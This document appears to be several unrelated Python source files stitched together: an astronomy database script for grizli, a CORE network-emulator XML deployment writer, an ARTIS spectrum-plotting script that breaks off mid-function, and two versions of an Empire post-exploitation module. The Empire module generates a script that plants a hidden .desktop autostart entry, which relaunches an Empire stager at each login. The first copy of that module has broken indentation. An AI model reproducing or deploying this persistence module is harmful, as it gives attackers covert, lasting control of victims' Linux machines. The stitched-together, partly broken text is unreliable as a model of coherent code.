        aor_data['field_root'].extend([field]*len(aors))
        aor_data['reqkey'].extend(list(aors))

    #
    import pandas as pd
    df = pd.DataFrame(aor_data)
    df.to_sql('spitzer_aors', engine, index=False, if_exists='append', method='multi')

    df = pd.DataFrame(data)

    # First row to initialize table
    # (array-valued footprint columns have to be added as SQL array
    # columns by hand, so drop them from the schema-defining insert)
    first = df[0:1]
    for k in bkey:
        first.pop('fp_'+k)

    engine.execute('drop table spitzer_log;')
    first.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
    for k in bkey:
        cmd = 'alter table spitzer_log add column fp_{0} float [];'.format(k)
        engine.execute(cmd)

    # Empty the schema row, then bulk-insert the full table
    engine.execute('delete from spitzer_log where True;')
    df.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
def show_all_fields():
    """
    Regenerate the HTML summary table and redshift histogram for every
    field (`root`) present in the `redshift_fit` table, then copy each
    histogram PNG to the shared S3 tables prefix.

    NOTE(review): relies on module-level `pd`, `os` and a global `engine`
    -- confirm they are in scope before running.
    """
    from grizli.aws import db as grizli_db
    import matplotlib.pyplot as plt
    # Non-interactive plotting for batch use
    plt.ioff()

    res = pd.read_sql_query("select distinct root from redshift_fit order by root;", engine)
    roots = res['root'].tolist()

    for root in roots:
        print('\n\n', root, '\n\n')
        # Skip fields whose histogram already exists locally
        if os.path.exists('{0}_zhist.png'.format(root)):
            continue

        try:
            res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'q_z'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
        except:
            # Best-effort: skip fields where the table build fails
            continue

        os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
|
import socket
import subprocess
import os
import xmlutils
from core.netns import nodes
from core.misc import ipaddr
from core import constants
class CoreDeploymentWriter(object):
    '''Writes deployment information (testbed hosts and EMANE
    platform/transport/NEM mappings) into a CORE scenario XML DOM.
    '''

    def __init__(self, dom, root, session):
        self.dom = dom
        self.root = root
        self.session = session
        self.hostname = socket.gethostname()
        # Pre-0.9.2 EMANE uses a single platform/transport element shared
        # by all NEMs; cache them so they are created only once.
        if self.session.emane.version < self.session.emane.EMANE092:
            self.transport = None
            self.platform = None

    @staticmethod
    def get_ipv4_addresses(hostname):
        '''Return the non-loopback IPv4 addresses of the given host.
        Only 'localhost' is currently supported.
        '''
        if hostname == 'localhost':
            addr_list = []
            cmd = (constants.IP_BIN, '-o', '-f', 'inet', 'addr', 'show')
            output = subprocess.check_output(cmd)
            for line in output.split(os.linesep):
                split = line.split()
                if not split:
                    continue
                # field 3 of `ip -o addr show` is the address/prefix
                addr = split[3]
                if not addr.startswith('127.'):
                    addr_list.append(addr)
            return addr_list
        else:
            # TODO: handle other hosts
            raise NotImplementedError

    @staticmethod
    def find_device(scenario, name):
        '''Return the device/host/router element with the given name
        attribute, or None if not found.
        '''
        tagName = ('device', 'host', 'router')
        for d in xmlutils.iterDescendantsWithAttribute(scenario, tagName,
                                                       'name', name):
            return d
        return None

    @staticmethod
    def find_interface(device, name):
        '''Return the named interface element of a device, or None.'''
        for i in xmlutils.iterDescendantsWithAttribute(device, 'interface',
                                                       'name', name):
            return i
        return None

    def add_deployment(self):
        '''Create the TestBed container and map every session node onto
        the local physical host.
        '''
        testbed = self.dom.createElement('container')
        testbed.setAttribute('name', 'TestBed')
        testbed.setAttribute('id', 'TestBed')
        self.root.baseEle.appendChild(testbed)
        nodelist = []
        for obj in self.session.objs():
            if isinstance(obj, nodes.PyCoreNode):
                nodelist.append(obj)
        name = self.hostname
        ipv4_addresses = self.get_ipv4_addresses('localhost')
        testhost = self.add_physical_host(testbed, name, ipv4_addresses)
        for n in nodelist:
            self.add_virtual_host(testhost, n)
        # TODO: handle other servers
        # servers = self.session.broker.getserverlist()
        # servers.remove('localhost')

    def add_child_element(self, parent, tagName):
        el = self.dom.createElement(tagName)
        parent.appendChild(el)
        return el

    def add_child_element_with_nameattr(self, parent, tagName,
                                        name, setid = True):
        '''Create a child element with a 'name' attribute and, optionally,
        a hierarchical 'id' derived from the parent's id.
        '''
        el = self.add_child_element(parent, tagName)
        el.setAttribute('name', name)
        if setid:
            el.setAttribute('id', '%s/%s' % (parent.getAttribute('id'), name))
        return el

    def add_address(self, parent, address_type, address_str):
        el = self.add_child_element(parent, 'address')
        el.setAttribute('type', address_type)
        el.appendChild(self.dom.createTextNode(address_str))
        return el

    def add_type(self, parent, type_str):
        el = self.add_child_element(parent, 'type')
        el.appendChild(self.dom.createTextNode(type_str))
        return el

    def add_platform(self, parent, name):
        el = self.add_child_element_with_nameattr(parent,
                                                  'emanePlatform', name)
        return el

    def add_transport(self, parent, name):
        el = self.add_child_element_with_nameattr(parent, 'transport', name)
        return el

    def add_nem(self, parent, name):
        el = self.add_child_element_with_nameattr(parent, 'nem', name)
        return el

    def add_parameter(self, parent, name, val):
        el = self.add_child_element_with_nameattr(parent, 'parameter',
                                                  name, False)
        el.appendChild(self.dom.createTextNode(val))
        return el

    def add_mapping(self, parent, maptype, mapref):
        el = self.add_child_element(parent, 'mapping')
        el.setAttribute('type', maptype)
        el.setAttribute('ref', mapref)
        return el

    def add_host(self, parent, name):
        el = self.add_child_element_with_nameattr(parent, 'testHost', name)
        return el

    def add_physical_host(self, parent, name, ipv4_addresses):
        el = self.add_host(parent, name)
        self.add_type(el, 'physical')
        for addr in ipv4_addresses:
            self.add_address(el, 'IPv4', addr)
        return el

    def add_virtual_host(self, parent, obj):
        '''Add a virtual testHost for an emulated node, mapping it to its
        scenario device and recording its interface addresses.
        '''
        assert isinstance(obj, nodes.PyCoreNode)
        el = self.add_host(parent, obj.name)
        device = self.find_device(self.root.baseEle, obj.name)
        # Bug fix: find_device() returns None when the scenario XML has
        # no matching device/host/router element; previously this crashed
        # with an AttributeError in add_mapping(). Warn and skip instead.
        if device is None:
            self.session.warn('corresponding XML device not found for %s' %
                              (obj.name))
            return
        self.add_mapping(device, 'testHost', el.getAttribute('id'))
        self.add_type(el, 'virtual')
        for netif in obj.netifs():
            for address in netif.addrlist:
                addr, slash, prefixlen = address.partition('/')
                if ipaddr.isIPv4Address(addr):
                    addr_type = 'IPv4'
                elif ipaddr.isIPv6Address(addr):
                    addr_type = 'IPv6'
                else:
                    raise NotImplementedError
                self.add_address(el, addr_type, address)
            if isinstance(netif.net, nodes.EmaneNode):
                nem = self.add_emane_interface(parent, el, netif)
                interface = self.find_interface(device, netif.name)
                self.add_mapping(interface, 'nem', nem.getAttribute('id'))
        return el

    def add_emane_interface(self, physical_host, virtual_host, netif,
                            platform_name = 'p1', transport_name = 't1'):
        '''Attach a NEM element for an EMANE interface, creating (or
        reusing, for pre-0.9.2 EMANE) the platform/transport elements.
        '''
        nemid = netif.net.nemidmap[netif]
        if self.session.emane.version < self.session.emane.EMANE092:
            # Shared platform/transport on the physical host
            if self.platform is None:
                self.platform = \
                    self.add_platform(physical_host, name = platform_name)
            platform = self.platform
            if self.transport is None:
                self.transport = \
                    self.add_transport(physical_host, name = transport_name)
            transport = self.transport
        else:
            # Per-host platform/transport
            platform = self.add_platform(virtual_host, name = platform_name)
            transport = self.add_transport(virtual_host, name = transport_name)
        nem_name = 'nem%s' % nemid
        nem = self.add_nem(platform, nem_name)
        self.add_parameter(nem, 'nemid', str(nemid))
        self.add_mapping(transport, 'nem', nem.getAttribute('id'))
        return nem
daemon: Check if devices are found when generating deployed scenario XML.
import socket
import subprocess
import os
import xmlutils
from core.netns import nodes
from core.misc import ipaddr
from core import constants
class CoreDeploymentWriter(object):
    '''Writes deployment information (testbed hosts and EMANE
    platform/transport/NEM mappings) into a CORE scenario XML DOM.
    '''

    def __init__(self, dom, root, session):
        self.dom = dom
        self.root = root
        self.session = session
        self.hostname = socket.gethostname()
        # Pre-0.9.2 EMANE uses a single platform/transport element shared
        # by all NEMs; cache them so they are created only once.
        if self.session.emane.version < self.session.emane.EMANE092:
            self.transport = None
            self.platform = None

    @staticmethod
    def get_ipv4_addresses(hostname):
        '''Return the non-loopback IPv4 addresses of the given host.
        Only 'localhost' is currently supported.
        '''
        if hostname == 'localhost':
            addr_list = []
            cmd = (constants.IP_BIN, '-o', '-f', 'inet', 'addr', 'show')
            output = subprocess.check_output(cmd)
            for line in output.split(os.linesep):
                split = line.split()
                if not split:
                    continue
                # field 3 of `ip -o addr show` is the address/prefix
                addr = split[3]
                if not addr.startswith('127.'):
                    addr_list.append(addr)
            return addr_list
        else:
            # TODO: handle other hosts
            raise NotImplementedError

    @staticmethod
    def find_device(scenario, name):
        '''Return the device/host/router element with the given name
        attribute, or None if not found.
        '''
        tagName = ('device', 'host', 'router')
        for d in xmlutils.iterDescendantsWithAttribute(scenario, tagName,
                                                       'name', name):
            return d
        return None

    @staticmethod
    def find_interface(device, name):
        '''Return the named interface element of a device, or None.'''
        for i in xmlutils.iterDescendantsWithAttribute(device, 'interface',
                                                       'name', name):
            return i
        return None

    def add_deployment(self):
        '''Create the TestBed container and map every session node onto
        the local physical host.
        '''
        testbed = self.dom.createElement('container')
        testbed.setAttribute('name', 'TestBed')
        testbed.setAttribute('id', 'TestBed')
        self.root.baseEle.appendChild(testbed)
        nodelist = []
        for obj in self.session.objs():
            if isinstance(obj, nodes.PyCoreNode):
                nodelist.append(obj)
        name = self.hostname
        ipv4_addresses = self.get_ipv4_addresses('localhost')
        testhost = self.add_physical_host(testbed, name, ipv4_addresses)
        for n in nodelist:
            self.add_virtual_host(testhost, n)
        # TODO: handle other servers
        # servers = self.session.broker.getserverlist()
        # servers.remove('localhost')

    def add_child_element(self, parent, tagName):
        el = self.dom.createElement(tagName)
        parent.appendChild(el)
        return el

    def add_child_element_with_nameattr(self, parent, tagName,
                                        name, setid = True):
        '''Create a child element with a 'name' attribute and, optionally,
        a hierarchical 'id' derived from the parent's id.
        '''
        el = self.add_child_element(parent, tagName)
        el.setAttribute('name', name)
        if setid:
            el.setAttribute('id', '%s/%s' % (parent.getAttribute('id'), name))
        return el

    def add_address(self, parent, address_type, address_str):
        el = self.add_child_element(parent, 'address')
        el.setAttribute('type', address_type)
        el.appendChild(self.dom.createTextNode(address_str))
        return el

    def add_type(self, parent, type_str):
        el = self.add_child_element(parent, 'type')
        el.appendChild(self.dom.createTextNode(type_str))
        return el

    def add_platform(self, parent, name):
        el = self.add_child_element_with_nameattr(parent,
                                                  'emanePlatform', name)
        return el

    def add_transport(self, parent, name):
        el = self.add_child_element_with_nameattr(parent, 'transport', name)
        return el

    def add_nem(self, parent, name):
        el = self.add_child_element_with_nameattr(parent, 'nem', name)
        return el

    def add_parameter(self, parent, name, val):
        el = self.add_child_element_with_nameattr(parent, 'parameter',
                                                  name, False)
        el.appendChild(self.dom.createTextNode(val))
        return el

    def add_mapping(self, parent, maptype, mapref):
        el = self.add_child_element(parent, 'mapping')
        el.setAttribute('type', maptype)
        el.setAttribute('ref', mapref)
        return el

    def add_host(self, parent, name):
        el = self.add_child_element_with_nameattr(parent, 'testHost', name)
        return el

    def add_physical_host(self, parent, name, ipv4_addresses):
        el = self.add_host(parent, name)
        self.add_type(el, 'physical')
        for addr in ipv4_addresses:
            self.add_address(el, 'IPv4', addr)
        return el

    def add_virtual_host(self, parent, obj):
        '''Add a virtual testHost for an emulated node, mapping it to its
        scenario device and recording its interface addresses.  Warns and
        returns None when the scenario XML has no matching device.
        '''
        assert isinstance(obj, nodes.PyCoreNode)
        el = self.add_host(parent, obj.name)
        device = self.find_device(self.root.baseEle, obj.name)
        # Guard: find_device() returns None when no device/host/router
        # element matches; skip the node rather than crash in add_mapping()
        if device is None:
            self.session.warn('corresponding XML device not found for %s' %
                              (obj.name))
            return
        self.add_mapping(device, 'testHost', el.getAttribute('id'))
        self.add_type(el, 'virtual')
        for netif in obj.netifs():
            for address in netif.addrlist:
                addr, slash, prefixlen = address.partition('/')
                if ipaddr.isIPv4Address(addr):
                    addr_type = 'IPv4'
                elif ipaddr.isIPv6Address(addr):
                    addr_type = 'IPv6'
                else:
                    raise NotImplementedError
                self.add_address(el, addr_type, address)
            if isinstance(netif.net, nodes.EmaneNode):
                nem = self.add_emane_interface(parent, el, netif)
                interface = self.find_interface(device, netif.name)
                self.add_mapping(interface, 'nem', nem.getAttribute('id'))
        return el

    def add_emane_interface(self, physical_host, virtual_host, netif,
                            platform_name = 'p1', transport_name = 't1'):
        '''Attach a NEM element for an EMANE interface, creating (or
        reusing, for pre-0.9.2 EMANE) the platform/transport elements.
        '''
        nemid = netif.net.nemidmap[netif]
        if self.session.emane.version < self.session.emane.EMANE092:
            # Shared platform/transport on the physical host
            if self.platform is None:
                self.platform = \
                    self.add_platform(physical_host, name = platform_name)
            platform = self.platform
            if self.transport is None:
                self.transport = \
                    self.add_transport(physical_host, name = transport_name)
            transport = self.transport
        else:
            # Per-host platform/transport
            platform = self.add_platform(virtual_host, name = platform_name)
            transport = self.add_transport(virtual_host, name = transport_name)
        nem_name = 'nem%s' % nemid
        nem = self.add_nem(platform, nem_name)
        self.add_parameter(nem, 'nemid', str(nemid))
        self.add_mapping(transport, 'nem', nem.getAttribute('id'))
        return nem
|
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'DesktopFile',
# list of one or more authors for the module
'Author': ['@jarrodcoulter'],
# more verbose multi-line description of the module
'Description': ('Installs an Empire launcher script in ~/.config/autostart on Linux versions with GUI.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [https://digitasecurity.com/blog/2018/01/23/crossrat/
https://specifications.freedesktop.org/desktop-entry-spec/latest/ar01s07.html,
https://neverbenever.wordpress.com/2015/02/11/how-to-autostart-a-program-in-raspberry-pi-or-linux/]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Remove' : {
'Description' : 'Remove Persistence based on FileName. True/False',
'Required' : False,
'Value' : ''
},
'FileName' : {
'Description' : 'File name without extension that you would like created in ~/.config/autostart/ folder.',
'Required' : False,
'Value' : 'sec_start'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
    """
    Build the Python persistence script that installs (or removes) a
    .desktop autostart entry under ~/.config/autostart.

    :param obfuscate: unused here; kept for the common module interface.
    :param obfuscationCommand: unused here; kept for the common module interface.
    :return: the generated Python payload source as a string.
    """
    remove = self.options['Remove']['Value']
    fileName = self.options['FileName']['Value']
    listenerName = self.options['Listener']['Value']

    launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python')
    # The stager launcher has the shape: echo "<payload>" | /usr/bin/python &
    # str.strip() removes a *character set*, not a substring, so the original
    # strip('echo').strip(' | /usr/bin/python &') could eat payload bytes that
    # happen to match those characters. Remove the exact prefix/suffix instead.
    prefix = 'echo '
    suffix = ' | /usr/bin/python &'
    if launcher.startswith(prefix):
        launcher = launcher[len(prefix):]
    if launcher.endswith(suffix):
        launcher = launcher[:-len(suffix)]
    launcher = launcher.strip()

    # Freedesktop .desktop entry that re-launches the payload at login.
    dtSettings = """
[Desktop Entry]
Name=%s
Exec=python -c %s
Type=Application
NoDisplay=True
""" % (fileName, launcher)

    # Script executed on the agent: writes (or removes) the autostart file.
    # The print statements are Python 2 syntax because the Empire agent
    # payload runs under Python 2.
    script = """
import subprocess
import sys
import os
remove = "%s"
dtFile = \"\"\"
%s
\"\"\"
home = os.path.expanduser("~")
filePath = home + "/.config/autostart/"
writeFile = filePath + "%s.desktop"
if remove.lower() == "true":
    if os.path.isfile(writeFile):
        os.remove(writeFile)
        print "\\n[+] Persistence has been removed"
    else:
        print "\\n[-] Persistence file does not exist, nothing removed"
else:
    if not os.path.exists(filePath):
        os.makedirs(filePath)
    e = open(writeFile,'wb')
    e.write(dtFile)
    e.close()
    print "\\n[+] Persistence has been installed: ~/.config/autostart/%s"
    print "\\n[+] Empire daemon has been written to %s"
""" % (remove, dtSettings, fileName, fileName, fileName)
    return script
Update comments
import base64
class Module:
    """
    Empire persistence module: installs an Empire Python launcher as a
    freedesktop .desktop autostart entry (~/.config/autostart) on Linux
    systems with a GUI, or removes a previously installed entry.
    """

    def __init__(self, mainMenu, params=None):
        """
        :param mainMenu: the Empire main menu object, used to reach the
            stager generator (self.mainMenu.stagers).
        :param params: optional list of [name, value] pairs used to
            pre-populate self.options (e.g. from the command line).
        """
        # metadata info about the module, not modified during runtime
        self.info = {
            # name for the module that will appear in module menus
            'Name': 'DesktopFile',
            # list of one or more authors for the module
            'Author': '@jarrodcoulter',
            # more verbose multi-line description of the module
            'Description': 'Installs an Empire launcher script in ~/.config/autostart on Linux versions with GUI.',
            # True if the module needs to run in the background
            'Background': False,
            # File extension to save the file as
            'OutputExtension': None,
            # if the module needs administrative privileges
            'NeedsAdmin': False,
            # True if the method doesn't touch disk/is reasonably opsec safe
            'OpsecSafe': False,
            # the module language
            'Language': 'python',
            # the minimum language version needed
            'MinLanguageVersion': '2.6',
            # list of any references/other comments
            'Comments': 'https://digitasecurity.com/blog/2018/01/23/crossrat/, https://specifications.freedesktop.org/desktop-entry-spec/latest/ar01s07.html, https://neverbenever.wordpress.com/2015/02/11/how-to-autostart-a-program-in-raspberry-pi-or-linux/'
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent': {
                # The 'Agent' option is the only one that MUST be in a module
                'Description': 'Agent to execute module on.',
                'Required': True,
                'Value': ''
            },
            'Listener': {
                'Description': 'Listener to use.',
                'Required': True,
                'Value': ''
            },
            'Remove': {
                'Description': 'Remove Persistence based on FileName. True/False',
                'Required': False,
                'Value': ''
            },
            'FileName': {
                'Description': 'File name without extension that you would like created in ~/.config/autostart/ folder.',
                'Required': False,
                'Value': 'sec_start'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # During instantiation, any settable option parameters are passed and
        # applied to the options dictionary. This is mostly in case options
        # are passed on the command line.
        # NOTE: the default was previously the mutable `params=[]`, which is
        # shared between calls; None avoids that pitfall with identical behavior.
        if params:
            for param in params:
                # parameter format is [Name, Value]
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """
        Build the Python persistence script that installs (or removes) the
        .desktop autostart entry.

        :param obfuscate: unused here; kept for the common module interface.
        :param obfuscationCommand: unused here; kept for the common module interface.
        :return: the generated Python payload source as a string.
        """
        remove = self.options['Remove']['Value']
        fileName = self.options['FileName']['Value']
        listenerName = self.options['Listener']['Value']

        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python')
        # The stager launcher has the shape: echo "<payload>" | /usr/bin/python &
        # str.strip() removes a *character set*, not a substring, so the original
        # strip('echo').strip(' | /usr/bin/python &') could eat payload bytes that
        # happen to match those characters. Remove the exact prefix/suffix instead.
        prefix = 'echo '
        suffix = ' | /usr/bin/python &'
        if launcher.startswith(prefix):
            launcher = launcher[len(prefix):]
        if launcher.endswith(suffix):
            launcher = launcher[:-len(suffix)]
        launcher = launcher.strip()

        # Freedesktop .desktop entry that re-launches the payload at login.
        dtSettings = """
[Desktop Entry]
Name=%s
Exec=python -c %s
Type=Application
NoDisplay=True
""" % (fileName, launcher)

        # Script executed on the agent: writes (or removes) the autostart file.
        # The print statements are Python 2 syntax because the Empire agent
        # payload runs under Python 2.
        script = """
import subprocess
import sys
import os
remove = "%s"
dtFile = \"\"\"
%s
\"\"\"
home = os.path.expanduser("~")
filePath = home + "/.config/autostart/"
writeFile = filePath + "%s.desktop"
if remove.lower() == "true":
    if os.path.isfile(writeFile):
        os.remove(writeFile)
        print "\\n[+] Persistence has been removed"
    else:
        print "\\n[-] Persistence file does not exist, nothing removed"
else:
    if not os.path.exists(filePath):
        os.makedirs(filePath)
    e = open(writeFile,'wb')
    e.write(dtFile)
    e.close()
    print "\\n[+] Persistence has been installed: ~/.config/autostart/%s"
    print "\\n[+] Empire daemon has been written to %s"
""" % (remove, dtSettings, fileName, fileName, fileName)
        return script
|
#!/usr/bin/env python3
import argparse
import glob
import itertools
import os.path
import sys
import warnings
import artistools as at
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import pandas as pd
# import matplotlib.ticker as ticker
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
def main(argsraw=None):
    """
    Plot ARTIS spectra and (optionally) reference spectra.

    :param argsraw: optional argv-style list for argparse; None means
        parse sys.argv.
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description='Plot ARTIS model spectra by finding spec.out files '
                    'in the current directory or subdirectories.')
    parser.add_argument('modelpath', default=[], nargs='*',
                        help='Paths to ARTIS folders with spec.out or packets files'
                             ' (may include wildcards such as * and **)')
    parser.add_argument('--frompackets', default=False, action='store_true',
                        help='Read packets files directly instead of exspec results')
    parser.add_argument('--emissionabsorption', default=False, action='store_true',
                        help='Show an emission/absorption plot')
    parser.add_argument('-maxseriescount', type=int, default=9,
                        help='Maximum number of plot series (ions/processes) for emission/absorption plot')
    parser.add_argument('-listtimesteps', action='store_true', default=False,
                        help='Show the times at each timestep')
    parser.add_argument('-timestep', nargs='?',
                        help='First timestep or a range e.g. 45-65')
    parser.add_argument('-timemin', type=float,
                        help='Lower time in days to integrate spectrum')
    parser.add_argument('-timemax', type=float,
                        help='Upper time in days to integrate spectrum')
    parser.add_argument('-xmin', type=int, default=2500,
                        help='Plot range: minimum wavelength in Angstroms')
    parser.add_argument('-xmax', type=int, default=11000,
                        help='Plot range: maximum wavelength in Angstroms')
    parser.add_argument('--normalised', default=False, action='store_true',
                        help='Normalise the spectra to their peak values')
    parser.add_argument('-obsspec', action='append', dest='refspecfiles',
                        help='Also plot reference spectrum from this file')
    parser.add_argument('-legendfontsize', type=int, default=8,
                        help='Font size of legend text')
    parser.add_argument('-o', action='store', dest='outputfile',
                        help='path/filename for PDF file')
    args = parser.parse_args(argsraw)

    # Default to the current directory and its immediate subdirectories.
    # (Fixed: truthiness test instead of len(...) == 0 on a sequence.)
    if not args.modelpath:
        args.modelpath = ['.', '*']

    # combined the results of applying wildcards on each input
    modelpaths = list(itertools.chain.from_iterable([glob.glob(x) for x in args.modelpath if os.path.isdir(x)]))

    if args.listtimesteps:
        at.showtimesteptimes(modelpaths[0])
    else:
        if args.emissionabsorption:
            if len(modelpaths) > 1:
                print("ERROR: emission/absorption plot can only take one input model")
                # Fixed: exit with a nonzero status on error (bare sys.exit()
                # previously exited 0, signalling success to the shell).
                sys.exit(1)
            defaultoutputfile = "plotspecemission.pdf"
        else:
            defaultoutputfile = "plotspec.pdf"

        if not args.outputfile:
            args.outputfile = defaultoutputfile
        elif os.path.isdir(args.outputfile):
            args.outputfile = os.path.join(args.outputfile, defaultoutputfile)

        make_plot(modelpaths, args)
def plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None, scale_to_peak=None,
                           **plotkwargs):
    """
    Plot every reference spectrum listed in args.refspecfiles onto *axis*,
    appending the resulting legend patch and label to plotobjects and
    plotobjectlabels (both mutated in place).
    """
    if args.refspecfiles is None:
        return

    colorlist = ['black', '0.4']
    for specindex, specfilename in enumerate(args.refspecfiles):
        label = at.spectra.refspectralabels.get(specfilename, specfilename)
        # Give the first few reference spectra fixed colors; beyond that,
        # fall back to whatever color the caller supplied (if any).
        if specindex < len(colorlist):
            plotkwargs['color'] = colorlist[specindex]
        patch = plot_reference_spectrum(
            specfilename, label, axis, args.xmin, args.xmax, args.normalised,
            flambdafilterfunc, scale_to_peak, **plotkwargs)
        plotobjects.append(patch)
        plotobjectlabels.append(label)
def plot_reference_spectrum(filename, serieslabel, axis, xmin, xmax, normalised,
                            flambdafilterfunc=None, scale_to_peak=None, **plotkwargs):
    """
    Plot one reference spectrum file (columns: wavelength in Angstroms,
    F_lambda) from the refspectra directory next to this script.

    :return: a matplotlib Patch carrying the line's color, for the legend.
    """
    scriptdir = os.path.dirname(os.path.abspath(__file__))
    filepath = os.path.join(scriptdir, 'refspectra', filename)
    specdata = pd.read_csv(filepath, delim_whitespace=True, header=None,
                           names=['lambda_angstroms', 'f_lambda'], usecols=[0, 1])

    print(f"Reference spectrum '{serieslabel}' has {len(specdata)} points in the plot range")

    specdata.query('lambda_angstroms > @xmin and lambda_angstroms < @xmax', inplace=True)

    # Fixed: print_integrated_flux lives in at.spectra (as called elsewhere
    # in this module); the bare name raised NameError at runtime.
    at.spectra.print_integrated_flux(specdata.f_lambda, specdata.lambda_angstroms)

    if len(specdata) > 5000:
        # Thin out very dense spectra to keep the PDF small and plotting fast.
        # specdata = scipy.signal.resample(specdata, 10000)
        # specdata = specdata.iloc[::3, :].copy()
        specdata.query('index % 3 == 0', inplace=True)
        print(f"  downsamping to {len(specdata)} points")

    # clamp negative values to zero
    specdata['f_lambda'] = specdata['f_lambda'].apply(lambda x: max(0, x))

    if flambdafilterfunc:
        specdata['f_lambda'] = flambdafilterfunc(specdata['f_lambda'])

    if normalised:
        specdata['f_lambda_scaled'] = (specdata['f_lambda'] / specdata['f_lambda'].max() *
                                       (scale_to_peak if scale_to_peak else 1.0))
        ycolumnname = 'f_lambda_scaled'
    else:
        ycolumnname = 'f_lambda'

    if 'linewidth' not in plotkwargs and 'lw' not in plotkwargs:
        plotkwargs['linewidth'] = 1.5

    lineplot = specdata.plot(x='lambda_angstroms', y=ycolumnname, ax=axis, label=serieslabel, zorder=-1, **plotkwargs)
    return mpatches.Patch(color=lineplot.get_lines()[0].get_color())
def plot_artis_spectrum(axis, modelpath, args, from_packets=False, filterfunc=None, **plotkwargs):
    """
    Plot one ARTIS model spectrum (flux vs. wavelength) onto *axis*.

    Reads spec.out in *modelpath*, or the packets files directly when
    *from_packets* is True, restricted to the time range selected by
    args.timestep / args.timemin / args.timemax.
    """
    specfilename = os.path.join(modelpath, 'spec.out')
    # Resolve the requested timestep/time range into concrete timestep
    # indices and day values for this model.
    (modelname, timestepmin, timestepmax,
     time_days_lower, time_days_upper) = at.get_model_name_times(
         specfilename, at.get_timestep_times(specfilename),
         args.timestep, args.timemin, args.timemax)

    linelabel = f'{modelname} at t={time_days_lower:.2f}d to {time_days_upper:.2f}d'

    if from_packets:
        # find any other packets files in the same directory
        packetsfiles_thismodel = glob.glob(os.path.join(modelpath, 'packets**.out'))
        print(packetsfiles_thismodel)
        spectrum = at.spectra.get_spectrum_from_packets(
            packetsfiles_thismodel, time_days_lower, time_days_upper, lambda_min=args.xmin, lambda_max=args.xmax)
    else:
        spectrum = at.spectra.get_spectrum(specfilename, timestepmin, timestepmax, fnufilterfunc=filterfunc)

    # Restrict to the plotted wavelength window before integrating the flux.
    spectrum.query('@args.xmin < lambda_angstroms and lambda_angstroms < @args.xmax', inplace=True)

    at.spectra.print_integrated_flux(spectrum['f_lambda'], spectrum['lambda_angstroms'])

    # The scaled column is always computed but only plotted when
    # args.normalised is set.
    spectrum['f_lambda_scaled'] = spectrum['f_lambda'] / spectrum['f_lambda'].max()

    ycolumnname = 'f_lambda_scaled' if args.normalised else 'f_lambda'
    spectrum.plot(x='lambda_angstroms', y=ycolumnname, ax=axis,
                  label=linelabel, alpha=0.95, **plotkwargs)
def make_spectrum_plot(modelpaths, axis, filterfunc, args):
    """
    Plot any observational reference spectra plus one ARTIS spectrum per
    model path onto *axis*.
    """
    plot_reference_spectra(axis, [], [], args, flambdafilterfunc=filterfunc)

    for seriesindex, folderpath in enumerate(modelpaths):
        modelname = at.get_model_name(folderpath)
        print(f"====> {modelname}")

        # Alternate solid/dashed every seven series, and thin the line a
        # little for each successive model so overlaps stay readable.
        # plotkwargs['dashes'] = dashesList[index]
        # plotkwargs['dash_capstyle'] = dash_capstyleList[index]
        serieskwargs = {
            'linestyle': '--' if (int(seriesindex / 7) % 2) else '-',
            'linewidth': 2.5 - (0.2 * seriesindex),
        }

        plot_artis_spectrum(axis, folderpath, args=args, from_packets=args.frompackets,
                            filterfunc=filterfunc, **serieskwargs)

    if args.normalised:
        axis.set_ylim(ymin=-0.1, ymax=1.25)
        axis.set_ylabel(r'Scaled F$_\lambda$')
def make_emission_plot(modelpath, axis, filterfunc, args):
    """
    Plot stacked per-ion/per-process emission contributions (positive y)
    and absorption contributions (mirrored below the x axis) for one
    ARTIS model.

    :return: (plotobjects, plotobjectlabels) for building the legend.
    """
    from astropy import constants as const
    maxion = 5  # must match sn3d.h value
    # Prefer emissiontrue.out when present; fall back to emission.out.
    emissionfilename = os.path.join(modelpath, 'emissiontrue.out')
    if not os.path.exists(emissionfilename):
        emissionfilename = os.path.join(modelpath, 'emission.out')
